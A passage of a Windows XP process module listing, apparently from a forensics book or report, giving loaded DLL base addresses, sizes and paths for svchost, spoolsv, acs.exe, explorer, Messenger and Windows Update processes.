C:\WINDOWS\WinSxS\x86_Microsoft.Windows.Common- Controls_6595b64144ccf1df_6.0.0.0_x-ww_1382d70a\comctl32.dll 0x77340000 0x8b000 C:\WINDOWS\system32\comctl32.dll 0x76fb0000 0x7000 C:\WINDOWS\System32\winrnr.dll 0x76fc0000 0x5000 C:\WINDOWS\system32\rasadhlp.dll 0x76fd0000 0x78000 C:\WINDOWS\system32\CLBCATQ.DLL 0x77050000 0xc5000 C:\WINDOWS\system32\COMRes.dll 0x77c00000 0x7000 C:\WINDOWS\system32\VERSION.dll

************************************************************************ svchost.exe pid: 1276 Command line : C:\WINDOWS\System32\svchost.exe -k netsvcs

0x76e10000 0x24000 c:\windows\system32\adsldpc.dll 0x71c20000 0x4f000 c:\windows\system32\NETAPI32.dll 0x76f60000 0x2c000 C:\WINDOWS\system32\WLDAP32.dll 0x76b20000 0x15000 c:\windows\system32\ATL.DLL 0x77120000 0x8b000 C:\WINDOWS\system32\OLEAUT32.dll 0x76e80000 0xd000 c:\windows\system32\rtutils.dll 0x71bf0000 0x11000 c:\windows\system32\SAMLIB.dll 0x76670000 0xe4000 c:\windows\system32\SETUPAPI.dll 0x76ee0000 0x37000 c:\windows\system32\RASAPI32.dll 0x76e90000 0x11000 c:\windows\system32\rasman.dll 0x76eb0000 0x2a000 c:\windows\system32\TAPI32.dll 0x76b40000 0x2c000 c:\windows\system32\WINMM.dll 0x76f90000 0x10000 c:\windows\system32\Secur32.dll 0x76da0000 0x30000 c:\windows\system32\WZCSvc.DLL 0x76d30000 0x4000 c:\windows\system32\WMI.dll 0x762c0000 0x8a000 C:\WINDOWS\system32\CRYPT32.dll 0x762a0000 0xf000 C:\WINDOWS\system32\MSASN1.dll 0x76f50000 0x8000 c:\windows\system32\WTSAPI32.dll 0x71a50000 0x3b000 C:\WINDOWS\system32\mswsock.dll 0x71a90000 0x8000 C:\WINDOWS\System32\wshtcpip.dll 0x5ad70000 0x34000 C:\WINDOWS\System32\UxTheme.dll 0xffd0000 0x22000 C:\WINDOWS\System32\rsaenh.dll 0x752d0000 0x3a000 c:\windows\system32\termsrv.dll 0x74f70000 0x5000 c:\windows\system32\ICAAPI.dll 0x76cc0000 0x10000 c:\windows\system32\AUTHZ.dll 0x75110000 0x1c000 c:\windows\system32\mstlsapi.dll 0x76bc0000 0xe000 C:\WINDOWS\System32\REGAPI.dll 0x65f40000 0x1c000 c:\windows\system32\irmon.dll 0x75a70000 0xa3000 C:\WINDOWS\system32\USERENV.dll 0x74f10000 0x10000 C:\WINDOWS\System32\rastls.dll 0x767f0000 0x24000 C:\WINDOWS\System32\SCHANNEL.dll 0x723d0000 0x1a000 C:\WINDOWS\System32\WinSCard.dll 0x74f30000 0xc000 C:\WINDOWS\System32\raschap.dll 0x77c00000 0x7000 C:\WINDOWS\system32\VERSION.dll 0x58d30000 0x5000 C:\WINDOWS\System32\wshirda.dll 0x76d10000 0x1d000 C:\WINDOWS\system32\msv1_0.dll 0x76ce0000 0x1f000 C:\WINDOWS\System32\NTMARTA.DLL 0x76c90000 0x22000 C:\WINDOWS\system32\IMAGEHLP.dll 0x72460000 0x15000 C:\WINDOWS\System32\rdpwsx.dll 0x73000000 0x23000 C:\WINDOWS\System32\WINSPOOL.DRV 0x76fd0000 0x78000 C:\WINDOWS\System32\CLBCATQ.DLL 0x77050000 0xc5000 C:\WINDOWS\System32\COMRes.dll 0x751d0000 0x29000 c:\windows\system32\schedsvc.dll 0x767a0000 0x13000 c:\windows\system32\NTDSAPI.dll 0x74f50000 0x5000 C:\WINDOWS\System32\MSIDLE.DLL 0x708b0000 0xc000 c:\windows\system32\audiosrv.dll 0x75170000 0x20000 c:\windows\system32\wkssvc.dll 0x74fa0000 0x10000 c:\windows\system32\cryptsvc.dll 0x76c30000 0x2b000 c:\windows\system32\WINTRUST.dll 0x75350000 0x30000 c:\windows\system32\certcli.dll 0x754d0000 0x76000 c:\windows\system32\CRYPTUI.dll 0x76200000 0x97000 C:\WINDOWS\system32\WININET.dll 0x69710000 0xfd000 c:\windows\system32\ESENT.dll 0x74ec0000 0x5000 c:\windows\system32\wuauserv.dll 0x724c0000 0xf000 c:\windows\system32\mspmspsv.dll 0x597a0000 0x1c000 c:\windows\system32\wbem\wmisvc.dll 0x75290000 0x38000 c:\windows\system32\wbem\wbemcomn.dll 0x753e0000 0x68000 C:\WINDOWS\system32\VSSAPI.DLL 0x767c0000 0x2a000 c:\windows\system32\w32time.dll 0x76080000 0x61000 c:\windows\system32\MSVCP60.dll 0x74f40000 0xa000 c:\windows\pchealth\helpctr\binaries\pchsvc.dll 0x75070000 0x16000 c:\windows\system32\trkwks.dll 0x751a0000 0x2a000 c:\windows\system32\srsvc.dll 0x73d20000 0x9000 c:\windows\system32\seclogon.dll 0x74f60000 0xb000 c:\windows\system32\msgsvc.dll 0x75090000 0x17000 c:\windows\system32\srvsvc.dll 0x76b70000 0x3d000 c:\windows\system32\es.dll 0x74f80000 0x8000 c:\windows\system32\ersvc.dll 0x75000000 0x1b000 C:\WINDOWS\System32\wuaueng.dll 0x75260000 0x27000 C:\WINDOWS\System32\ADVPACK.dll 0x76bb0000 0x4000 C:\WINDOWS\System32\sfc.dll 107

0x76c60000 0x29000 C:\WINDOWS\System32\sfc_os.dll 0x722d0000 0xc000 c:\windows\system32\sens.dll 0x75e90000 0xa1000 C:\WINDOWS\System32\SXS.DLL 0x75730000 0x11d000 C:\WINDOWS\system32\comsvcs.dll 0x750f0000 0x12000 C:\WINDOWS\system32\MTXCLU.DLL 0x71ad0000 0x8000 C:\WINDOWS\system32\WSOCK32.dll 0x75130000 0x13000 C:\WINDOWS\system32\colbact.DLL 0x74fc0000 0x10000 C:\WINDOWS\System32\CLUSAPI.DLL 0x750b0000 0x11000 C:\WINDOWS\System32\RESUTILS.DLL 0x750d0000 0x17000 C:\WINDOWS\System32\mtxoci.dll 0x74fe0000 0xf000 c:\windows\system32\browser.dll 0x71c80000 0x6000 C:\WINDOWS\System32\NETRAP.dll 0x75450000 0x77000 C:\WINDOWS\System32\wbem\wbemcore.dll 0x75310000 0x3c000 C:\WINDOWS\System32\wbem\esscli.dll 0x75690000 0x92000 C:\WINDOWS\System32\wbem\FastProx.dll 0x75020000 0x1b000 C:\WINDOWS\System32\wbem\wmiutils.dll 0x75200000 0x24000 C:\WINDOWS\System32\wbem\repdrvfs.dll 0x597f0000 0x67000 C:\WINDOWS\System32\wbem\wmiprvsd.dll 0x5f770000 0xe000 C:\WINDOWS\system32\NCObjAPI.DLL 0x75390000 0x42000 C:\WINDOWS\System32\wbem\wbemess.dll 0x5f740000 0x11000 C:\WINDOWS\System32\wbem\ncprov.dll 0x75cf0000 0x190000 C:\WINDOWS\system32\NETSHELL.dll 0x76c00000 0x2d000 C:\WINDOWS\system32\credui.dll 0x75040000 0x1f000 C:\WINDOWS\System32\upnp.dll 0x74f00000 0xa000 C:\WINDOWS\System32\SSDPAPI.dll 0x68880000 0x3f000 C:\WINDOWS\System32\hnetcfg.dll 0x76fc0000 0x5000 C:\WINDOWS\System32\rasadhlp.dll 0x75550000 0x9e000 C:\WINDOWS\System32\RASDLG.dll 0x58cd0000 0x29000 C:\WINDOWS\System32\wuv3is.dll 0x75150000 0x13000 C:\WINDOWS\System32\Cabinet.dll 0x722b0000 0x5000 C:\WINDOWS\System32\sensapi.dll 0x74ed0000 0xf000 C:\WINDOWS\System32\wbem\wbemsvc.dll

************************************************************************ svchost.exe pid: 1568 Command line : C:\WINDOWS\System32\svchost.exe -k NetworkService

0x76da0000 0x30000 c:\windows\system32\WZCSvc.DLL 0x76d30000 0x4000 c:\windows\system32\WMI.dll 0x76d80000 0x1a000 c:\windows\system32\DHCPCSVC.DLL 0x762c0000 0x8a000 C:\WINDOWS\system32\CRYPT32.dll 0x762a0000 0xf000 C:\WINDOWS\system32\MSASN1.dll 0x76f50000 0x8000 c:\windows\system32\WTSAPI32.dll 0x76360000 0xf000 c:\windows\system32\WINSTA.dll 0x71950000 0xe4000 C:\WINDOWS\WinSxS\x86_Microsoft.Windows.Common- Controls_6595b64144ccf1df_6.0.0.0_x-ww_1382d70a\comctl32.dll 0x77340000 0x8b000 C:\WINDOWS\system32\comctl32.dll 0x71a50000 0x3b000 C:\WINDOWS\system32\mswsock.dll 0x71a90000 0x8000 C:\WINDOWS\System32\wshtcpip.dll

************************************************************************ svchost.exe pid: 1592 Command line : C:\WINDOWS\System32\svchost.exe -k LocalService

Base Size Path 0x1000000 0x6000 C:\WINDOWS\System32\svchost.exe 0x77f50000 0xa9000 C:\WINDOWS\System32\ntdll.dll 0x77e60000 0xe5000 C:\WINDOWS\system32\kernel32.dll 0x77dd0000 0x8b000 C:\WINDOWS\system32\ADVAPI32.dll 0x77cc0000 0x75000 C:\WINDOWS\system32\RPCRT4.dll 0x771b0000 0x11a000 C:\WINDOWS\system32\ole32.dll 0x77c70000 0x40000 C:\WINDOWS\system32\GDI32.dll 0x77d40000 0x8d000 C:\WINDOWS\system32\USER32.dll 0x74c40000 0x6000 c:\windows\system32\lmhsvc.dll 0x77c10000 0x53000 C:\WINDOWS\system32\msvcrt.dll 0x76d60000 0x15000 c:\windows\system32\iphlpapi.dll 0x76de0000 0x26000 c:\windows\system32\netman.dll 0x76d40000 0x16000 c:\windows\system32\MPRAPI.dll 0x76e40000 0x2f000 c:\windows\system32\ACTIVEDS.dll 0x76e10000 0x24000 c:\windows\system32\adsldpc.dll 0x71c20000 0x4f000 c:\windows\system32\NETAPI32.dll 0x76f60000 0x2c000 C:\WINDOWS\system32\WLDAP32.dll 0x76b20000 0x15000 c:\windows\system32\ATL.DLL 0x77120000 0x8b000 C:\WINDOWS\system32\OLEAUT32.dll 0x76e80000 0xd000 c:\windows\system32\rtutils.dll 0x71bf0000 0x11000 c:\windows\system32\SAMLIB.dll 0x76670000 0xe4000 c:\windows\system32\SETUPAPI.dll 0x76ee0000 0x37000 c:\windows\system32\RASAPI32.dll 0x76e90000 0x11000 c:\windows\system32\rasman.dll 0x71ab0000 0x15000 c:\windows\system32\WS2_32.dll 0x71aa0000 0x8000 c:\windows\system32\WS2HELP.dll 0x76eb0000 0x2a000 c:\windows\system32\TAPI32.dll 0x772d0000 0x63000 C:\WINDOWS\system32\SHLWAPI.dll 0x76b40000 0x2c000 c:\windows\system32\WINMM.dll 0x773d0000 0x7f4000 C:\WINDOWS\system32\SHELL32.dll 0x76f90000 0x10000 c:\windows\system32\Secur32.dll 0x76da0000 0x30000 c:\windows\system32\WZCSvc.DLL 0x76d30000 0x4000 c:\windows\system32\WMI.dll 0x76d80000 0x1a000 c:\windows\system32\DHCPCSVC.DLL 0x76f20000 0x25000 c:\windows\system32\DNSAPI.dll 0x762c0000 0x8a000 C:\WINDOWS\system32\CRYPT32.dll 0x762a0000 0xf000 C:\WINDOWS\system32\MSASN1.dll 0x76f50000 0x8000 c:\windows\system32\WTSAPI32.dll 0x76360000 0xf000 c:\windows\system32\WINSTA.dll 0x71950000 0xe4000 C:\WINDOWS\WinSxS\x86_Microsoft.Windows.Common- Controls_6595b64144ccf1df_6.0.0.0_x-ww_1382d70a\comctl32.dll 0x77340000 0x8b000 C:\WINDOWS\system32\comctl32.dll 0x5a6e0000 0x14000 c:\windows\system32\webclnt.dll 0x76200000 0x97000 C:\WINDOWS\system32\WININET.dll 0x71ad0000 0x8000 C:\WINDOWS\System32\wsock32.dll 0x74c20000 0x10000 c:\windows\system32\regsvc.dll 0x74c10000 0xd000 c:\windows\system32\ssdpsrv.dll 0x71a50000 0x3b000 C:\WINDOWS\system32\mswsock.dll 0x71a90000 0x8000 C:\WINDOWS\System32\wshtcpip.dll 0x5ad70000 0x34000 C:\WINDOWS\system32\uxtheme.dll

************************************************************************ 109

spoolsv.exe pid: 1788 Command line : C:\WINDOWS\system32\spoolsv.exe

Base Size Path 0x1000000 0xf000 C:\WINDOWS\system32\spoolsv.exe 0x77f50000 0xa9000 C:\WINDOWS\System32\ntdll.dll 0x77e60000 0xe5000 C:\WINDOWS\system32\kernel32.dll 0x77c10000 0x53000 C:\WINDOWS\system32\msvcrt.dll 0x77dd0000 0x8b000 C:\WINDOWS\system32\ADVAPI32.dll 0x77cc0000 0x75000 C:\WINDOWS\system32\RPCRT4.dll 0x77c70000 0x40000 C:\WINDOWS\system32\GDI32.dll 0x77d40000 0x8d000 C:\WINDOWS\system32\USER32.dll 0x742e0000 0x13000 C:\WINDOWS\system32\SPOOLSS.DLL 0x71ab0000 0x15000 C:\WINDOWS\system32\WS2_32.dll 0x71aa0000 0x8000 C:\WINDOWS\system32\WS2HELP.dll 0x76f20000 0x25000 C:\WINDOWS\system32\DNSAPI.dll 0x76fc0000 0x5000 C:\WINDOWS\system32\rasadhlp.dll 0x74320000 0x49000 C:\WINDOWS\system32\localspl.dll 0x771b0000 0x11a000 C:\WINDOWS\system32\ole32.dll 0x77120000 0x8b000 C:\WINDOWS\system32\OLEAUT32.dll 0x77c00000 0x7000 C:\WINDOWS\system32\VERSION.dll 0x76f90000 0x10000 C:\WINDOWS\system32\Secur32.dll 0x76c60000 0x29000 C:\WINDOWS\system32\sfc_os.dll 0x76c30000 0x2b000 C:\WINDOWS\system32\WINTRUST.dll 0x762c0000 0x8a000 C:\WINDOWS\system32\CRYPT32.dll 0x762a0000 0xf000 C:\WINDOWS\system32\MSASN1.dll 0x76c90000 0x22000 C:\WINDOWS\system32\IMAGEHLP.dll 0x75a70000 0xa3000 C:\WINDOWS\system32\USERENV.dll 0x73000000 0x23000 C:\WINDOWS\system32\winspool.drv 0x71c20000 0x4f000 C:\WINDOWS\system32\netapi32.dll 0x742a0000 0xe000 C:\WINDOWS\system32\cnbjmon.dll 0x71a50000 0x3b000 C:\WINDOWS\system32\mswsock.dll 0x74280000 0x7000 C:\WINDOWS\system32\pjlmon.dll 0x72400000 0xc000 C:\WINDOWS\system32\tcpmon.dll 0x723f0000 0x7000 C:\WINDOWS\system32\usbmon.dll 0x76fb0000 0x7000 C:\WINDOWS\System32\winrnr.dll 0x76f60000 0x2c000 C:\WINDOWS\system32\WLDAP32.dll 0x742b0000 0x1f000 C:\WINDOWS\system32\win32spl.dll 0x71c80000 0x6000 C:\WINDOWS\system32\NETRAP.dll 0x76fd0000 0x78000 C:\WINDOWS\system32\CLBCATQ.DLL 0x77050000 0xc5000 C:\WINDOWS\system32\COMRes.dll 0x74300000 0x14000 C:\WINDOWS\system32\inetpp.dll 0x74290000 0x4000 C:\WINDOWS\system32\icmp.dll 0x76d60000 0x15000 C:\WINDOWS\system32\iphlpapi.DLL 0x76de0000 0x26000 C:\WINDOWS\system32\netman.dll 0x76d40000 0x16000 C:\WINDOWS\system32\MPRAPI.dll 0x76e40000 0x2f000 C:\WINDOWS\system32\ACTIVEDS.dll 0x76e10000 0x24000 C:\WINDOWS\system32\adsldpc.dll 0x76b20000 0x15000 C:\WINDOWS\system32\ATL.DLL 0x76e80000 0xd000 C:\WINDOWS\system32\rtutils.dll 0x71bf0000 0x11000 C:\WINDOWS\system32\SAMLIB.dll 0x76670000 0xe4000 C:\WINDOWS\system32\SETUPAPI.dll 0x76ee0000 0x37000 C:\WINDOWS\system32\RASAPI32.dll 0x76e90000 0x11000 C:\WINDOWS\system32\rasman.dll 0x76eb0000 0x2a000 C:\WINDOWS\system32\TAPI32.dll 0x772d0000 0x63000 C:\WINDOWS\system32\SHLWAPI.dll 0x76b40000 0x2c000 C:\WINDOWS\system32\WINMM.dll 0x773d0000 0x7f4000 C:\WINDOWS\system32\SHELL32.dll 0x76da0000 0x30000 C:\WINDOWS\system32\WZCSvc.DLL 0x76d30000 0x4000 C:\WINDOWS\system32\WMI.dll 0x76d80000 0x1a000 C:\WINDOWS\system32\DHCPCSVC.DLL 0x76f50000 0x8000 C:\WINDOWS\system32\WTSAPI32.dll 0x76360000 0xf000 C:\WINDOWS\system32\WINSTA.dll 0x71950000 0xe4000 C:\WINDOWS\WinSxS\x86_Microsoft.Windows.Common- Controls_6595b64144ccf1df_6.0.0.0_x-ww_1382d70a\comctl32.dll 0x77340000 0x8b000 C:\WINDOWS\system32\comctl32.dll

************************************************************************ acs.exe pid: 1960 Command line : C:\WINDOWS\System32\acs.exe 110

Base Size Path 0x400000 0x74000 C:\WINDOWS\System32\acs.exe 0x77f50000 0xa9000 C:\WINDOWS\System32\ntdll.dll 0x77e60000 0xe5000 C:\WINDOWS\system32\kernel32.dll 0x10000000 0x4c000 C:\WINDOWS\System32\athcfg20U.dll 0x74ae0000 0x7000 C:\WINDOWS\System32\CFGMGR32.dll 0x76670000 0xe4000 C:\WINDOWS\System32\setupapi.dll 0x77c10000 0x53000 C:\WINDOWS\system32\msvcrt.dll 0x77dd0000 0x8b000 C:\WINDOWS\system32\ADVAPI32.dll 0x77cc0000 0x75000 C:\WINDOWS\system32\RPCRT4.dll 0x77c70000 0x40000 C:\WINDOWS\system32\GDI32.dll 0x77d40000 0x8d000 C:\WINDOWS\system32\USER32.dll 0x76d60000 0x15000 C:\WINDOWS\System32\iphlpapi.dll 0x76de0000 0x26000 C:\WINDOWS\System32\netman.dll 0x76d40000 0x16000 C:\WINDOWS\System32\MPRAPI.dll 0x76e40000 0x2f000 C:\WINDOWS\System32\ACTIVEDS.dll 0x76e10000 0x24000 C:\WINDOWS\System32\adsldpc.dll 0x71c20000 0x4f000 C:\WINDOWS\System32\NETAPI32.dll 0x76f60000 0x2c000 C:\WINDOWS\system32\WLDAP32.dll 0x76b20000 0x15000 C:\WINDOWS\System32\ATL.DLL 0x771b0000 0x11a000 C:\WINDOWS\system32\ole32.dll 0x77120000 0x8b000 C:\WINDOWS\system32\OLEAUT32.dll 0x76e80000 0xd000 C:\WINDOWS\System32\rtutils.dll 0x71bf0000 0x11000 C:\WINDOWS\System32\SAMLIB.dll 0x76ee0000 0x37000 C:\WINDOWS\System32\RASAPI32.dll 0x76e90000 0x11000 C:\WINDOWS\System32\rasman.dll 0x71ab0000 0x15000 C:\WINDOWS\System32\WS2_32.dll 0x71aa0000 0x8000 C:\WINDOWS\System32\WS2HELP.dll 0x76eb0000 0x2a000 C:\WINDOWS\System32\TAPI32.dll 0x772d0000 0x63000 C:\WINDOWS\system32\SHLWAPI.dll 0x76b40000 0x2c000 C:\WINDOWS\System32\WINMM.dll 0x773d0000 0x7f4000 C:\WINDOWS\system32\SHELL32.dll 0x76f90000 0x10000 C:\WINDOWS\System32\Secur32.dll 0x76da0000 0x30000 C:\WINDOWS\System32\WZCSvc.DLL 0x76d30000 0x4000 C:\WINDOWS\System32\WMI.dll 0x76d80000 0x1a000 C:\WINDOWS\System32\DHCPCSVC.DLL 0x76f20000 0x25000 C:\WINDOWS\System32\DNSAPI.dll 0x762c0000 0x8a000 C:\WINDOWS\system32\CRYPT32.dll 0x762a0000 0xf000 C:\WINDOWS\system32\MSASN1.dll 0x76f50000 0x8000 C:\WINDOWS\System32\WTSAPI32.dll 0x76360000 0xf000 C:\WINDOWS\System32\WINSTA.dll 0x77c00000 0x7000 C:\WINDOWS\system32\VERSION.dll 0x75a70000 0xa3000 C:\WINDOWS\system32\USERENV.dll 0x71ad0000 0x8000 C:\WINDOWS\System32\WSOCK32.dll 0x72830000 0xf2000 C:\WINDOWS\System32\MFC42u.DLL 0x340000 0x1f000 C:\WINDOWS\System32\athcfg20ResU.dll 0x76bf0000 0xb000 C:\WINDOWS\System32\PSAPI.DLL 0x72550000 0x4f000 C:\WINDOWS\System32\pdh.dll 0x763b0000 0x45000 C:\WINDOWS\system32\comdlg32.dll 0x71950000 0xe4000 C:\WINDOWS\WinSxS\X86_Microsoft.Windows.Common- Controls_6595b64144ccf1df_6.0.0.0_x-ww_1382d70a\COMCTL32.dll 0x1f7b0000 0x31000 C:\WINDOWS\System32\ODBC32.dll 0x1f9b0000 0x6000 C:\WINDOWS\System32\odbcbcp.dll 0x723d0000 0x1a000 C:\WINDOWS\System32\WinSCard.dll 0x76080000 0x61000 C:\WINDOWS\System32\MSVCP60.dll 0x360000 0x10000 C:\WINDOWS\System32\MSVCIRT.dll 0x1f850000 0x16000 C:\WINDOWS\System32\odbcint.dll 0x5ad70000 0x34000 C:\WINDOWS\system32\uxtheme.dll 0xcd0000 0x42000 C:\WINDOWS\System32\wsfwDS.dll 0xd20000 0x41000 C:\WINDOWS\System32\wsimd.dll 0x73000000 0x23000 C:\WINDOWS\System32\WINSPOOL.DRV 0xee0000 0x17b000 C:\WINDOWS\System32\DSA.dll 0xffd0000 0x22000 C:\WINDOWS\System32\rsaenh.dll

************************************************************************ explorer.exe pid: 1656 Command line : C:\WINDOWS\Explorer.EXE

111

Base Size Path 0x1000000 0xf7000 C:\WINDOWS\Explorer.EXE 0x77f50000 0xa9000 C:\WINDOWS\System32\ntdll.dll 0x77e60000 0xe5000 C:\WINDOWS\system32\kernel32.dll 0x77c10000 0x53000 C:\WINDOWS\system32\msvcrt.dll 0x77dd0000 0x8b000 C:\WINDOWS\system32\ADVAPI32.dll 0x77cc0000 0x75000 C:\WINDOWS\system32\RPCRT4.dll 0x77c70000 0x40000 C:\WINDOWS\system32\GDI32.dll 0x77d40000 0x8d000 C:\WINDOWS\system32\USER32.dll 0x772d0000 0x63000 C:\WINDOWS\system32\SHLWAPI.dll 0x773d0000 0x7f4000 C:\WINDOWS\system32\SHELL32.dll 0x771b0000 0x11a000 C:\WINDOWS\system32\ole32.dll 0x77120000 0x8b000 C:\WINDOWS\system32\OLEAUT32.dll 0x75f80000 0xfc000 C:\WINDOWS\System32\BROWSEUI.dll 0x769c0000 0x149000 C:\WINDOWS\System32\SHDOCVW.dll 0x5ad70000 0x34000 C:\WINDOWS\System32\UxTheme.dll 0x71950000 0xe4000 C:\WINDOWS\WinSxS\x86_Microsoft.Windows.Common- Controls_6595b64144ccf1df_6.0.0.0_x-ww_1382d70a\comctl32.dll 0x77340000 0x8b000 C:\WINDOWS\system32\comctl32.dll 0x75f40000 0x1d000 C:\WINDOWS\system32\appHelp.dll 0x76fd0000 0x78000 C:\WINDOWS\System32\CLBCATQ.DLL 0x77050000 0xc5000 C:\WINDOWS\System32\COMRes.dll 0x77c00000 0x7000 C:\WINDOWS\system32\VERSION.dll 0x76620000 0x4e000 C:\WINDOWS\System32\cscui.dll 0x76600000 0x1b000 C:\WINDOWS\System32\CSCDLL.dll 0x5b630000 0x70000 C:\WINDOWS\System32\themeui.dll 0x76f90000 0x10000 C:\WINDOWS\System32\Secur32.dll 0x76380000 0x5000 C:\WINDOWS\System32\MSIMG32.dll 0x75a70000 0xa3000 C:\WINDOWS\system32\USERENV.dll 0x71c20000 0x4f000 C:\WINDOWS\System32\netapi32.dll 0x71bf0000 0x11000 C:\WINDOWS\System32\SAMLIB.dll 0x76670000 0xe4000 C:\WINDOWS\System32\SETUPAPI.dll 0x75cf0000 0x190000 C:\WINDOWS\system32\NETSHELL.dll 0x76c00000 0x2d000 C:\WINDOWS\system32\credui.dll 0x71ab0000 0x15000 C:\WINDOWS\system32\WS2_32.dll 0x71aa0000 0x8000 C:\WINDOWS\system32\WS2HELP.dll 0x76d60000 0x15000 C:\WINDOWS\system32\iphlpapi.dll 0x76de0000 0x26000 C:\WINDOWS\system32\netman.dll 0x76d40000 0x16000 C:\WINDOWS\system32\MPRAPI.dll 0x76e40000 0x2f000 C:\WINDOWS\system32\ACTIVEDS.dll 0x76e10000 0x24000 C:\WINDOWS\system32\adsldpc.dll 0x76f60000 0x2c000 C:\WINDOWS\system32\WLDAP32.dll 0x76b20000 0x15000 C:\WINDOWS\system32\ATL.DLL 0x76e80000 0xd000 C:\WINDOWS\system32\rtutils.dll 0x76ee0000 0x37000 C:\WINDOWS\system32\RASAPI32.dll 0x76e90000 0x11000 C:\WINDOWS\system32\rasman.dll 0x76eb0000 0x2a000 C:\WINDOWS\system32\TAPI32.dll 0x76b40000 0x2c000 C:\WINDOWS\system32\WINMM.dll 0x76da0000 0x30000 C:\WINDOWS\system32\WZCSvc.DLL 0x76d30000 0x4000 C:\WINDOWS\system32\WMI.dll 0x76d80000 0x1a000 C:\WINDOWS\system32\DHCPCSVC.DLL 0x76f20000 0x25000 C:\WINDOWS\system32\DNSAPI.dll 0x762c0000 0x8a000 C:\WINDOWS\system32\CRYPT32.dll 0x762a0000 0xf000 C:\WINDOWS\system32\MSASN1.dll 0x76f50000 0x8000 C:\WINDOWS\system32\WTSAPI32.dll 0x76360000 0xf000 C:\WINDOWS\system32\WINSTA.dll 0x76990000 0x24000 C:\WINDOWS\System32\ntshrui.dll 0x76400000 0x1fb000 C:\WINDOWS\System32\msi.dll 0x74b30000 0x41000 C:\WINDOWS\System32\webcheck.dll 0x74b00000 0x20000 C:\WINDOWS\System32\stobject.dll 0x74af0000 0x9000 C:\WINDOWS\System32\BatMeter.dll 0x74ad0000 0x7000 C:\WINDOWS\System32\POWRPROF.dll 0x72430000 0x12000 C:\WINDOWS\System32\browselc.dll 0x76200000 0x97000 C:\WINDOWS\system32\WININET.dll 0x760f0000 0x78000 C:\WINDOWS\system32\urlmon.dll 0x71b20000 0x11000 C:\WINDOWS\system32\MPR.dll 0x75f60000 0x6000 C:\WINDOWS\System32\drprov.dll 0x71c10000 0xd000 C:\WINDOWS\System32\ntlanman.dll 0x71cd0000 0x16000 C:\WINDOWS\System32\NETUI0.dll 0x71c90000 0x3c000 C:\WINDOWS\System32\NETUI1.dll 0x71c80000 0x6000 C:\WINDOWS\System32\NETRAP.dll 112

0x75f70000 0x9000 C:\WINDOWS\System32\davclnt.dll 0x6c1b0000 0x43000 C:\WINDOWS\System32\DUSER.dll 0x75970000 0xf1000 C:\WINDOWS\System32\MSGINA.dll 0x1f7b0000 0x31000 C:\WINDOWS\System32\ODBC32.dll 0x763b0000 0x45000 C:\WINDOWS\system32\comdlg32.dll 0x1f850000 0x16000 C:\WINDOWS\System32\odbcint.dll 0x74b80000 0x82000 C:\WINDOWS\System32\printui.dll 0x73000000 0x23000 C:\WINDOWS\System32\WINSPOOL.DRV 0x74ae0000 0x7000 C:\WINDOWS\System32\CFGMGR32.dll 0x5c060000 0x12000 C:\WINDOWS\System32\srclient.dll 0x692c0000 0x2e000 C:\WINDOWS\System32\Wbem\framedyn.dll 0x75e90000 0xa1000 C:\WINDOWS\System32\SXS.DLL 0x76170000 0x88000 C:\WINDOWS\System32\shdoclc.dll 0x71d40000 0x1b000 C:\WINDOWS\System32\actxprxy.dll

************************************************************************ msmsgs.exe pid: 792 Command line : "C:\Program Files\Messenger\msmsgs.exe" /background

Base Size Path 0x400000 0x107000 C:\Program Files\Messenger\msmsgs.exe 0x77f50000 0xa9000 C:\WINDOWS\System32\ntdll.dll 0x77e60000 0xe5000 C:\WINDOWS\system32\kernel32.dll 0x77dd0000 0x8b000 C:\WINDOWS\system32\ADVAPI32.DLL 0x77cc0000 0x75000 C:\WINDOWS\system32\RPCRT4.dll 0x77c70000 0x40000 C:\WINDOWS\system32\GDI32.DLL 0x77d40000 0x8d000 C:\WINDOWS\system32\USER32.dll 0x771b0000 0x11a000 C:\WINDOWS\system32\OLE32.DLL 0x77120000 0x8b000 C:\WINDOWS\system32\OLEAUT32.DLL 0x77c10000 0x53000 C:\WINDOWS\system32\MSVCRT.DLL 0x71950000 0xe4000 C:\WINDOWS\WinSxS\X86_Microsoft.Windows.Common- Controls_6595b64144ccf1df_6.0.0.0_x-ww_1382d70a\COMCTL32.DLL 0x772d0000 0x63000 C:\WINDOWS\system32\SHLWAPI.dll 0x773d0000 0x7f4000 C:\WINDOWS\system32\SHELL32.DLL 0x5ad70000 0x34000 C:\WINDOWS\system32\uxtheme.dll 0x69200000 0x24000 C:\Program Files\Messenger\MSGSLANG.DLL 0x76fd0000 0x78000 C:\WINDOWS\System32\CLBCATQ.DLL 0x77050000 0xc5000 C:\WINDOWS\System32\COMRes.dll 0x77c00000 0x7000 C:\WINDOWS\system32\VERSION.dll 0x75e90000 0xa1000 C:\WINDOWS\System32\SXS.DLL 0x76f50000 0x8000 C:\WINDOWS\System32\wtsapi32.dll 0x76360000 0xf000 C:\WINDOWS\System32\WINSTA.dll 0x76b70000 0x3d000 C:\WINDOWS\System32\es.dll 0x71ab0000 0x15000 C:\WINDOWS\System32\WS2_32.dll 0x71aa0000 0x8000 C:\WINDOWS\System32\WS2HELP.dll 0x76c00000 0x2d000 C:\WINDOWS\System32\credui.dll 0x76200000 0x97000 C:\WINDOWS\system32\wininet.dll 0x762c0000 0x8a000 C:\WINDOWS\system32\CRYPT32.dll 0x762a0000 0xf000 C:\WINDOWS\system32\MSASN1.dll 0x76f90000 0x10000 C:\WINDOWS\System32\Secur32.dll 0x722b0000 0x5000 C:\WINDOWS\System32\sensapi.dll

************************************************************************ wuauclt.exe pid: 484 Command line : "C:\WINDOWS\System32\wuauclt.exe"

Base Size Path 0x1000000 0x1e000 C:\WINDOWS\System32\wuauclt.exe 0x77f50000 0xa9000 C:\WINDOWS\System32\ntdll.dll 0x77e60000 0xe5000 C:\WINDOWS\system32\kernel32.dll 0x77c10000 0x53000 C:\WINDOWS\system32\msvcrt.dll 0x77dd0000 0x8b000 C:\WINDOWS\system32\ADVAPI32.dll 0x77cc0000 0x75000 C:\WINDOWS\system32\RPCRT4.dll 0x77c70000 0x40000 C:\WINDOWS\system32\GDI32.dll 0x77d40000 0x8d000 C:\WINDOWS\system32\USER32.dll 0x773d0000 0x7f4000 C:\WINDOWS\system32\SHELL32.dll 0x772d0000 0x63000 C:\WINDOWS\system32\SHLWAPI.dll 0x771b0000 0x11a000 C:\WINDOWS\system32\ole32.dll 0x77120000 0x8b000 C:\WINDOWS\system32\OLEAUT32.dll 113

